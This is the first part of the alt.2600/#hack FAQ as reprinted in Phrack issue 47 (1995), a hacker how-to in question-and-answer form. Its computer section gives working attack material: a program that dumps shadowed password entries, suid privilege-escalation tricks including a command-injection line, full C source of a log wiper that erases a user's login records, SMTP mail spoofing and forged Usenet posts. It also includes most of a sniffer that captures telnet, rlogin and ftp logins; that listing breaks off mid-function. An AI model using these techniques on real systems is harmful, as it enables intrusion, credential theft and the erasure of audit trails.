[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]


..[ Phrack Magazine ]..
.:: The #hack FAQ (Part 1) ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #47 | Release date : 1995-04-15 | Editor : Erik Bloodaxe
IntroductionErik Bloodaxe
Phrack LoopbackPhrack Staff
Line NoisePhrack Staff
Line NoisePhrack Staff
The #hack FAQ (Part 1)voyager
The #hack FAQ (Part 2)voyager
The #hack FAQ (Part 3)voyager
The #hack FAQ (Part 4)voyager
DEFCon InformationPhrack Staff
HoHoConNetta Gilboa
HoHoConCount Zero
HoHo Miscellanyvarious
An Overview of Prepaid Calling CardsTreason
The Glenayre GL3000 Paging and Voice Retrieval SystemArmitage
Complete Guide to Hacking Meridian Voice MailSubstance
DBS Primer from American Hacker Magazineunknown
Your New Windows Background (Part 1)The Man
Your New Windows Background (Part 2)Substance
A Guide To British Telecom's Caller ID ServiceDr. B0B
A Day in The Life of a Warez BrokerXxxx Xxxxxxxx
International Scenesvarious
Phrack World NewsDatastream Cowboy
Title : The #hack FAQ (Part 1)
Author : voyager
                              ==Phrack Magazine==

                 Volume Six, Issue Forty-Seven, File 5 of 22



Editors Note: Welcome to special release of the alt.2600/#hack FAQ for
              Phrack Magazine!

              The purpose of this FAQ is to give you a general
              introduction to the topics covered on alt.2600 and
              #hack.  No document will make you a hacker.

              If you have a question regarding any of the topics
              covered in the FAQ, please direct it to alt.2600 or
              #hack.  Please do not e-mail me with them, I'm getting
              swamped.

              If your copy of the alt.2600/#hack FAQ does not end with
              the letters EOT on a line by themselves, you do not have
              the entire FAQ.


                                    The

			    alt.2600/#Hack F.A.Q.

                     Special release for Phrack Magazine

                        A TNO Communication Production

                                    by

                                  Voyager
			    will@gnu.ai.mit.edu

				Sysop of
			     Hacker's Haven
			      (303)343-4053

                         With greets going out to:

        A-Flat, Al, Aleph1, Bluesman, Cavalier, C-Curve, DeadKat,
        Disorder, Edison, Erik Bloodaxe, Hobbit, KCrow, Major,
        Marauder, Novocain, Outsider, Presence, Rogue Agent, sbin,
        Taran King, Theora, ThePublic, Tomes and TheSaint.


		       We work in the dark
		       We do what we can
		       We give what we have
		       Our doubt is our passion,
		       and our passion is our task
		       The rest is the madness of art.

				-- Henry James



Section A: Computers

  01. How do I access the password file under Unix?
  02. How do I crack Unix passwords?
  03. What is password shadowing?
  04. Where can I find the password file if it's shadowed?
  05. What is NIS/yp?
  06. What are those weird characters after the comma in my passwd file?
  07. How do I access the password file under VMS?
  08. How do I crack VMS passwords?
  09. How do I break out of a restricted shell?
  10. How do I gain root from a suid script or program?
  11. How do I erase my presence from the system logs?
  12. How do I send fakemail?
  13. How do I fake posts to UseNet?
  14. How do I hack ChanOp on IRC?
  15. How do I modify the IRC client to hide my real username?
  16. How to I change to directories with strange characters in them?
  17. What is ethernet sniffing?
  18. What is an Internet Outdial?
  19. What are some Internet Outdials?
  20. What is this system?
  21. What are the default accounts for XXX ?
  22. What port is XXX on?
  23. What is a trojan/worm/virus/logic bomb?
  24. How can I protect myself from viruses and such?
  25. Where can I get more information about viruses?
  26. What is Cryptoxxxxxxx?
  27. What is PGP?
  28. What is Tempest?
  29. What is an anonymous remailer?
  30. What are the addresses of some anonymous remailers?
  31. How do I defeat copy protection?
  32. What is 127.0.0.1?
  33. How do I post to a moderated newsgroup?


Section B: Telephony

  01. What is a Red Box?
  02. How do I build a Red Box?
  03. Where can I get a 6.5536Mhz crystal?
  04. Which payphones will a Red Box work on?
  05. How do I make local calls with a Red Box?
  06. What is a Blue Box?
  07. Do Blue Boxes still work?
  08. What is a Black Box?
  09. What do all the colored boxes do?
  10. What is an ANAC number?
  11. What is the ANAC number for my area?
  12. What is a ringback number?
  13. What is the ringback number for my area?
  14. What is a loop?
  15. What is a loop in my area?
  16. What is a CNA number?
  17. What is the telephone company CNA number for my area?
  18. What are some numbers that always ring busy?
  19. What are some numbers that temporarily disconnect phone service?
  20. What is scanning?
  21. Is scanning illegal?
  22. Where can I purchase a lineman's handset?
  23. What are the DTMF frequencies?
  24. What are the frequencies of the telephone tones?
  25. What are all of the * (LASS) codes?
  26. What frequencies do cordless phones operate on?
  27. What is Caller-ID?
  28. What is a PBX?
  29. What is a VMB?


Section C: Resources

  01. What are some ftp sites of interest to hackers?
  02. What are some fsp sites of interest to hackers?
  03. What are some newsgroups of interest to hackers?
  04. What are some telnet sites of interest to hackers?
  05. What are some gopher sites of interest to hackers?
  06. What are some World wide Web (WWW) sites of interest to hackers?
  07. What are some IRC channels of interest to hackers?
  08. What are some BBS's of interest to hackers?
  09. What are some books of interest to hackers?
  10. What are some videos of interest to hackers?
  11. What are some mailing lists of interest to hackers?
  12. What are some print magazines of interest to hackers?
  13. What are some e-zines of interest to hackers?
  14. What are some organizations of interest to hackers?
  15. Where can I purchase a magnetic stripe encoder/decoder?
  16. What are the rainbow books and how can I get them?


Section D: 2600

  01. What is alt.2600?
  02. What does "2600" mean?
  03. Are there on-line versions of 2600 available?
  04. I can't find 2600 at any bookstores.  What can I do?
  05. Why does 2600 cost more to subscribe to than to buy at a newsstand?


Section E: Phrack Magazine

  01. What is Phrack Magazine?
  02. How can I reach Phrack Magazine?
  03. Who Publishes Phrack?
  04. How often does Phrack go out?
  05. How do I subscribe?
  06. Why don't I get any response when I email Phrack?
  07. Does Phrack cost money?
  08. How can I submit articles?
  09. What is Phrack's PGP key?
  10. Where can I get back issues?


Section F: Miscellaneous

  01. What does XXX stand for?
  02. How do I determine if I have a valid credit card number?
  03. What bank issued this credit card?
  04. What are the ethics of hacking?
  05. Where can I get a copy of the alt.2600/#hack FAQ?


Section A: Computers
~~~~~~~~~~~~~~~~~~~~

01. How do I access the password file under Unix?

In standard Unix the password file is /etc/passwd.  On a Unix system
with either NIS/yp or password shadowing, much of the password data
may be elsewhere.


02. How do I crack Unix passwords?

Contrary to popular belief, Unix passwords cannot be decrypted.  Unix
passwords are encrypted with a one way function.  The login program
encrypts the text you enter at the "password:" prompt and compares
that encrypted string against the encrypted form of your password.

Password cracking software uses wordlists.  Each word in the wordlist
is encrypted and the results are compared to the encrypted form of the
target password.

The best cracking program for Unix passwords is currently Crack by
Alec Muffett.  For PC-DOS, the best package to use is currently
CrackerJack.


03. What is password shadowing?

Password shadowing is a security system where the encrypted password
field of /etc/passwd is replaced with a special token and the
encrypted password is stored in a separate file which is not readable
by normal system users.

To defeat password shadowing on many (but not all) systems, write a
program that uses successive calls to getpwent() to obtain the
password file.

Example:

#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}


04. Where can I find the password file if it's shadowed?

Unix                  Path                            Token
-----------------------------------------------------------------
AIX 3                 /etc/security/passwd            !
       or             /tcb/auth/files/<first letter   #
                            of username>/<username>
A/UX 3.0s             /tcb/files/auth/?/*
BSD4.3-Reno           /etc/master.passwd              *
ConvexOS 10           /etc/shadpw                     *
ConvexOS 11           /etc/shadow                     *
DG/UX                 /etc/tcb/aa/user/               *
EP/IX                 /etc/shadow                     x
HP-UX                 /.secure/etc/passwd             *
IRIX 5                /etc/shadow                     x
Linux 1.1             /etc/shadow                     *
OSF/1                 /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x        /tcb/auth/files/<first letter   *
                            of username>/<username>
SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
SunOS 5.0             /etc/shadow
                      <optional NIS+ private secure maps/tables/whatever>
System V Release 4.0  /etc/shadow                     x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]            *
UNICOS                /etc/udb                        *


05. What is NIS/yp?

NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages).  The purpose for NIS is to allow many
machines on a network to share configuration information, including
password data.  NIS is not designed to promote system security.  If
your system uses NIS you will have a very short /etc/passwd file that
includes a line that looks like this:

+::0:0:::

To view the real password file use this command "ypcat passwd"


06. What are those weird characters after the comma in my passwd file?

The characters are password aging data.  Password aging forces the
user to change passwords after a System Administrator specified period
of time.  Password aging can also force a user to keep a password for
a certain number of weeks before changing it.

]
] Sample entry from /etc/passwd with password aging installed:
]
] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash
]

Note the comma in the encrypted password field.  The characters after
the comma are used by the password aging mechanism.

]
] Password aging characters from above example:
]
] M.z8
]

The four characters are interpreted as follows:

  1: Maximum number of weeks a password can be used without changing.
  2: Minimum number of weeks a password must be used before changing.
3&4: Last time password was changed, in number of weeks since 1970.

Three special cases should be noted:

If the first and second characters are set to '..' the user will be
forced to change his/her passwd the next time he/she logs in.  The
passwd program will then remove the passwd aging characters, and the
user will not be subjected to password aging requirements again.

If the third and fourth characters are set to '..' the user will be
forced to change his/her passwd the next time he/she logs in. Password
aging will then occur as defined by the first and second characters.

If the first character (MAX) is less than the second character (MIN),
the user is not allowed to change his/her password.  Only root can
change that users password.

It should also be noted that the su command does not check the password
aging data.  An account with an expired password can be su'd to
without being forced to change the password.


                        Password Aging Codes
+------------------------------------------------------------------------+
|                                                                        |
| Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |
|    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |
|                                                                        |
| Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |
|    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
|                                                                        |
| Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |
|    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
|                                                                        |
| Character:  w  x  y  z                                                 |
|    Number: 60 61 62 63                                                 |
|                                                                        |
+------------------------------------------------------------------------+


07. How do I access the password file under VMS?

Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,
unlike Unix, most users do not have access to read the password file.


08. How do I crack VMS passwords?

Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.

Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.


09. How do I break out of a restricted shell?

On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function.  A good example is vi.  Run vi and use this command:

:set shell=/bin/sh

then shell using this command:

:shell


10. How do I gain root from a suid script or program?

1. Change IFS.

If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS.  IFS is the Internal
Field Separator that the shell uses to delimit arguments.

If the program contains a line that looks like this:

system("/bin/date")

and you change IFS to '/' the shell will them interpret the
proceeding line as:

bin date

Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.

To change IFS, use this command:

IFS='/';export IFS      # Bourne Shell
setenv IFS '/'          # C Shell
export IFS='/'          # Korn Shell


2. link the script to -i

Create a symbolic link named "-i" to the program.  Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode.  This only works on suid shell scripts.

Example:

% ln suid.sh -i
% -i
#


3. Exploit a race condition

Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.

Example:

nice -19 suidprog ; ln -s evilprog suidroot


4. Send bad input to the program.

Invoke the name of the program and a separate command on the same
command line.

Example:

suidprog ; id


11. How do I erase my presence from the system logs?

Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text
files that can be edited by hand with vi, you must use a program
specifically written for this purpose.

Example:

#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;
 
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
               bzero((char *)&utmp_ent,sizeof(struct utmp ));
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
               pos = -1L;
          } else pos += 1L;
        }
     }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("%s: ?\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
    printf("Error.\n");
}


12. How do I send fakemail?

Telnet to port 25 of the machine you want the mail to appear to
originate from.  Enter your message as in this example:

 HELO bellcore.com
 MAIL FROM:Voyager@bellcore.com
 RCPT TO:president@whitehouse.gov
 DATA

	Please discontinue your silly Clipper initiative.
 .
 QUIT

On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"
line will not work.  Test by sending yourself fakemail first.

For more information read RFC 822 "Standard for the format of ARPA
Internet text messages."


13. How do I fake posts to UseNet?

Use inews to post.  Give inews the following lines:

 From:
 Newsgroups:
 Subject:
 Message-ID:
 Date:
 Organization:

For a moderated newsgroup, inews will also require this line:

 Approved:

Then add your post and terminate with <Control-D>.

Example:

 From: Eric S. Real
 Newsgroups: alt.hackers
 Subject: Pathetic bunch of wannabe losers
 Message-ID: <esr.123@locke.ccil.org>
 Date: Fri, 13 Aug 1994 12:15:03
 Organization: Moral Majority

 A pathetic bunch of wannabe losers is what most of you are, with no
 right to steal the honorable title of `hacker' to puff up your silly
 adolescent egos. Get stuffed, get lost, and go to jail.

                                        Eric S. Real <esr@locke.ccil.org>


 ^D

Note that many systems will append an Originator: line to your message
header, effectively revealing the account from which the message was
posted.


14. How do I hack ChanOp on IRC?

Find a server that is split from the rest of IRC and create your own
channel there using the name of the channel you want ChanOp on.  When
that server reconnects to the net, you will have ChanOp on the real
channel.  If you have ServerOp on a server, you can cause it to split
on purpose.


15. How do I modify the IRC client to hide my real username?

Get the IRC client from cs.bu.edu /irc/clients.  Look at the source
code files irc.c and ctcp.c.  The code you are looking for is fairly
easy to spot.  Change it. Change the username code in irc.c and the
ctcp information code in ctcp.c.  Compile and run your client.

Here are the diffs from a sample hack of the IRC client.  Your client
code will vary slightly depending on what IRC client version you are
running.

*** ctcp.c.old  Wed Feb 10 10:08:05 1993
--- ctcp.c      Fri Feb 12 04:33:55 1993
***************
*** 331,337 ****
	struct  passwd  *pwd;
	long    diff;
	int     uid;
!       char    c;
  
	/*
	 * sojge complained that ircII says 'idle 1 seconds'
--- 331,337 ----
	struct  passwd  *pwd;
	long    diff;
	int     uid;
!       char    c, *fing;
  
	/*
	 * sojge complained that ircII says 'idle 1 seconds'
***************
*** 348,354 ****
	if (uid != DAEMON_UID)
	{
  #endif /* DAEMON_UID */       
!               if (pwd = getpwuid(uid))
		{
			char    *tmp;
  
--- 348,356 ----
	if (uid != DAEMON_UID)
	{
  #endif /* DAEMON_UID */       
!               if (fing = getenv("IRCFINGER"))
!                       send_ctcp_reply(from, ctcp->name, fing, diff, c);
!               else if (pwd = getpwuid(uid))
		{
			char    *tmp;
  
*** irc.c.old   Wed Feb 10 06:33:11 1993
--- irc.c       Fri Feb 12 04:02:11 1993
***************
*** 510,516 ****
		malloc_strcpy(&my_path, "/");
	if (*realname == null(char))
		strmcpy(realname, "*Unknown*", REALNAME_LEN);
!       if (*username == null(char))
	{
		if (ptr = getenv("USER"))
			strmcpy(username, ptr, NAME_LEN);
--- 510,518 ----
		malloc_strcpy(&my_path, "/");
	if (*realname == null(char))
		strmcpy(realname, "*Unknown*", REALNAME_LEN);
!       if (ptr = getenv("IRCUSER"))
!               strmcpy(username, ptr, NAME_LEN);
!       else if (*username == null(char))
	{
		if (ptr = getenv("USER"))
			strmcpy(username, ptr, NAME_LEN);


16. How to I change to directories with strange characters in them?

These directories are often used by people trying to hide information,
most often warez (commercial software).

There are several things you can do to determine what these strange
characters are.  One is to use the arguments to the ls command that
cause ls to give you more information:

From the man page for ls:

    -F   Causes directories to be marked with a trailing ``/'',
	 executable files to be marked with a trailing ``*'', and
	 symbolic links to be marked with a trailing ``@'' symbol.

    -q   Forces printing of non-graphic characters in filenames as the
	 character ``?''.

    -b   Forces printing of non-graphic characters in the \ddd
	 notation, in octal.

Perhaps the most useful tool is to simply do an "ls -al filename" to
save the directory of the remote ftp site as a file on your local
machine.  Then you can do a "cat -t -v -e filename" to see exactly
what those bizarre little characters are.

From the man page for cat:

    -v  Causes non-printing characters (with the exception of tabs,
	newlines, and form feeds) to be displayed.  Control characters
	are displayed as ^X (<Ctrl>x), where X is the key pressed with
	the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The
	<Del> character (octal 0177) is printed as ^?.  Non-ASCII
	characters (with the high bit set) are printed as M -x, where
	x is the character specified by the seven low order bits.

    -t  Causes tabs to be printed as ^I and form feeds as ^L.  This
	option is ignored if the -v option is not specified.

    -e  Causes a ``$'' character to be printed at the end of each line
	(prior to the new-line).  This option is ignored if the -v
	option is not set.

If the directory name includes a <SPACE> or a <TAB> you will need to
enclose the entire directory name in quotes.  Example:

cd "..<TAB>"

On an IBM-PC, you may enter these special characters by holding down
the <ALT> key and entering the decimal value of the special character
on your numeric keypad.  When you release the <ALT> key, the special
character should appear on your screen.  An ASCII chart can be very
helpful.

Sometimes people will create directories with some of the standard
stty control characters in them, such as ^Z (suspend) or ^C (intr).
To get into those directories, you will first need to user stty to
change the control character in qustion to another character.

From the man page for stty:

    Control assignments

    control-character C
                      Sets control-character to C, where control-character is
                      erase, kill, intr (interrupt), quit, eof, eol, swtch
                      (switch), start, stop or susp.

                      start and stop are available as possible control char-
                      acters for the control-character C assignment.

                      If C is preceded by a caret (^) (escaped from the
                      shell), then the value used is the corresponding con-
                      trol character (for example, ^D is a <Ctrl>d; ^? is
                      interpreted as DELETE and ^- is interpreted as unde-
                      fined).

Use the stty -a command to see your current stty settings, and to
determine which one is causing you problems.


17. What is ethernet sniffing?

Ethernet sniffing is listening (with software) to the raw ethernet
device for packets that interest you.  When your software sees a
packet that fits certain criteria, it logs it to a file.  The most
common criteria for an interesting packet is one that contains words
like "login" or "password."

Many ethernet sniffers are available, here are a few that may be on
your system now:

OS              Sniffer
~~              ~~~~~~~
HP/UX           nettl (monitor) & netfmt (display)
                nfswatch        /* Available via anonymous ftp           */
Irix            nfswatch        /* Available via anonymous ftp           */
                Etherman
SunOS           etherfind
                nfswatch        /* Available via anonymous ftp           */
Solaris         snoop
DOS             ETHLOAD         /* Available via anonymous ftp as        */
                                /* ethld104.zip                          */
                The Gobbler     /* Available via anonymous ftp           */
                LanPatrol
                LanWatch
		Netmon
                Netwatch
                Netzhack        /* Available via anonymous ftp at        */
                                /* mistress.informatik.unibw-muenchen.de */
                                /* /pub/netzhack.mac                     */
Macintosh       Etherpeek

Here is source code for an ethernet sniffer:

/* Esniff.c */

#include <stdio.h>
#include <ctype.h>
#include <string.h>

#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>

#include <netdb.h>
#include <arpa/inet.h>

#define ERR stderr

char    *malloc();
char    *device,
        *ProgName,
        *LogName;
FILE    *LOG;
int     debug=0;

#define NIT_DEV     "/dev/nit"
#define CHUNKSIZE   4096        /* device buffer size */
int     if_fd = -1;
int     Packet[CHUNKSIZE+32];

void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
  exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
  exit(err); }

#define IP          ((struct ip *)Packet)
#define IP_OFFSET   (0x1FFF)
#define SZETH       (sizeof(struct ether_header))
#define IPLEN       (ntohs(ip->ip_len))
#define IPHLEN      (ip->ip_hl)
#define TCPOFF      (tcph->th_off)
#define IPS         (ip->ip_src)
#define IPD         (ip->ip_dst)
#define TCPS        (tcph->th_sport)
#define TCPD        (tcph->th_dport)
#define IPeq(s,t)   ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN  (128)
time_t  LastTIME = 0;

struct CREC {
     struct CREC *Next,
                 *Last;
     time_t  Time;              /* start time */
     struct in_addr SRCip,
                    DSTip;
     u_int   SRCport,           /* src/dst ports */
             DSTport;
     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
     u_int   Length;            /* current data length */
     u_int   PKcnt;             /* # pkts */
     u_long  LASTseq;
};

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

  return( (he)?(he->h_name):(inet_ntoa(ip)) );
}

char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

  SFL(0,TH_FIN, 'F');
  SFL(1,TH_SYN, 'S');
  SFL(2,TH_RST, 'R');
  SFL(3,TH_PUSH,'P');
  SFL(4,TH_ACK, 'A');
  SFL(5,TH_URG, 'U');
  iobuf[6]=0;
  return(iobuf);
}

char *SERVp(port)
register u_int port;
{ static char buf[10];
  register char *p;

   switch(port) {
     case IPPORT_LOGINSERVER: p="rlogin"; break;
     case IPPORT_TELNET:      p="telnet"; break;
     case IPPORT_SMTP:        p="smtp"; break;
     case IPPORT_FTP:         p="ftp"; break;
     default: sprintf(buf,"%u",port); p=buf; break;
   }
   return(p);
}

char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
  p[strlen(p)-6]=0; /* strip " YYYY\n" */
  return(p);
}

char *NOWtm()
{ time_t tm;
  time(&tm);
  return( Ptm(&tm) );
}

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  register struct CREC *CLtmp = \
        (struct CREC *)malloc(sizeof(struct CREC)); \
  time( &(CLtmp->Time) ); \
  CLtmp->SRCip.s_addr = SIP.s_addr; \
  CLtmp->DSTip.s_addr = DIP.s_addr; \
  CLtmp->SRCport = SPORT; \
  CLtmp->DSTport = DPORT; \
  CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  CLtmp->PKcnt = 1; \
  CLtmp->Next = CLroot; \
  CLtmp->Last = NULL; \
  CLroot = CLtmp; \
}

register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;

  while(CLr != NULL) {
    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
            break;
    CLr = CLr->Next;
  }
  return(CLr);
}

#define ADDDATA_NODE(CL,DATA,LEN) { \
 bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
 CL->Length += LEN; \
}

#define PR_DATA(dp,ln) {    \
  register u_char lastc=0; \
  while(ln-- >0) { \
     if(*dp < 32) {  \
        switch(*dp) { \
            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
                        break; \
            case '\r': \
            case '\n': fprintf(LOG,"\n     : "); \
                        break; \
            default  : fprintf(LOG,"^%c", (*dp + 64)); \
                        break; \
        } \
     } else { \
        if(isprint(*dp)) fputc(*dp,LOG); \
        else fprintf(LOG,"(%d)",*dp); \
     } \
     lastc = *dp++; \
  } \
  fflush(LOG); \
}

void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
                        NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
   fprintf(LOG," DATA: ");
    { register u_int i = CLe->Length;
      register u_char *p = CLe->Data;
      PR_DATA(p,i);
      PR_DATA(d,dl);
    }

   fprintf(LOG,"\n-- \n");
   fflush(LOG);

   if(CLe->Next != NULL)
    CLe->Next->Last = CLe->Last;
   if(CLe->Last != NULL)
    CLe->Last->Next = CLe->Next;
   else
    CLroot = CLe->Next;
   free(CLe);
}

/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
  time_t tm; \
  time(&tm); \
  if(LastTIME<tm) { \
     register struct CREC *CLe,*CLt = CLroot; \
     LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
     while(CLe=CLt) { \
       CLt=CLe->Next; \
       if(CLe->Time <tm) \
           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
     } \
  } \
}

void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
 register struct ip     *ip;
 register struct tcphdr *tcph;

 { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

   if(EtherType < 0x600) {
     EtherType = *(u_short *)(cp + SZETH + 6);
     cp+=8; pktlen-=8;
   }

   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
      return;
 }

    /* ugh, gotta do an alignment :-( */
 bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

 ip = (struct ip *)Packet;
 if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
    return;
 tcph = (struct tcphdr *)(Packet + IPHLEN);

 if(!( (TCPD == IPPORT_TELNET) ||
       (TCPD == IPPORT_LOGINSERVER) ||
       (TCPD == IPPORT_FTP)
   )) return;

 { register struct CREC *CLm;
   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
   register u_char *p = (u_char *)Packet;

   p += ((IPHLEN * 4) + (TCPOFF * 4));

 if(debug) {
  fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
 }

   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {

      CLm->PKcnt++;

      if(length>0)
        if( (CLm->Length + length) < MAXBUFLEN ) {
          ADDDATA_NODE( CLm, p,length);
        } else {
          END_NODE( CLm, p,length, "DATA LIMIT");
        }

      if(TCPFL(TH_FIN|TH_RST)) {
          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
      }

   } else {

      if(TCPFL(TH_SYN)) {
         ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
      }

   }

   IDLE_NODE();

 }

}

/* signal handler
 */
void death()
{ register struct CREC *CLe;

    while(CLe=CLroot)
        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
    fflush(LOG);
    if(LOG != stdout)
        fclose(LOG);
    exit(1);
}

/* opens network interface, performs ioctls and reads from it,
 * passing data to filter function
 */
void do_it()
{
    int cc;
    char *buf;
    u_short sp_ts_len;

